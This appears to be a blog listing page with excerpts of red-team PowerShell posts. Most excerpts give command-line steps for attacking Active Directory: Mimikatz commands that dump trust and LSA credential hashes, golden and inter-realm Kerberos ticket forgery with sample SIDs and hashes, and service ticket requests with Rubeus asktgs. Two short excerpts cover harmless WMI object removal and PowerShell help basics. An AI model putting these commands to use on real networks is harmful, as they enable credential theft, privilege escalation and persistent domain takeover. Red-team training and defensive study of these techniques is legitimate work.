Powershell * RED TEAM SECURITY

Privilege Escalation Across Trust

Priv esc across domains: trust tickets:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::trust /patch"'
An inter-realm TGT can be forged:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /domain:security.local /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /sid:S-1-5-21-1200125816-2926698244-2119389380-502 /rc4:62e72bcfbac429fa51d15ec57caa506d /user:administrator /service:krbtgt /target:security.local /ticket:ticket.kirbi"'
Gets a TGT for a service (CIFS below) in the target domain by using the forged trust ticket.
PS C:\Users\victim6\Downloads\Ghostpack-CompiledBinaries-master\Ghostpack-CompiledBinaries-master> asktgs.exe C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration\ticket.kirbi CIFS/WIN-2RUMVG5JPOC.security.local…

Powershell * WMI

Classes Remove an Object

WMI returns live, editable objects, so be careful when removing an object:
PS C:\Windows\system32> Get-WmiObject -Class win32_process | where-object {$_.Name -eq "notepad.exe"} | Remove-WmiObject
PS C:\Windows\system32> Get-CimInstance -ClassName win32_process -Filter "Name = 'notepad.exe'" | remove-ciminstance
PS C:\Windows\system32> Get-WmiObject -class win32_process -filter 'Name = "calculator.exe"'
PS C:\Windows\system32> Get-WmiObject -class win32_process -list
Exploring Methods: Find all…

Powershell * RED TEAM SECURITY

Powershell Beginner

Powershell help system: list everything which contains the word process:
PS C:\Users\victim6\Downloads\new\new> get-help *process*
PS C:\Users\victim6\Downloads\new\new> get-help about_*
PS C:\Users\victim6\Downloads\new\new> $psversiontable
PS C:\Users\victim6\Downloads\new\new> get-help Get-Process -Parameter name
PS C:\Users\victim6\Downloads\new\new> get-help *
Update the help system (v3+):
PS C:\Users\victim6\Downloads\new\new> update-help
List full help about a topic:
PS C:\Users\victim6\Downloads\new\new> get-help get-item
Lists examples of how…

Powershell * RED TEAM SECURITY

Persistence Flow

Persistence Technique: Golden Ticket:
Execute mimikatz on DC:
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
On any machine:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt"'
To use the DCSync feature for getting the krbtgt hash, execute the below command with DA privileges for…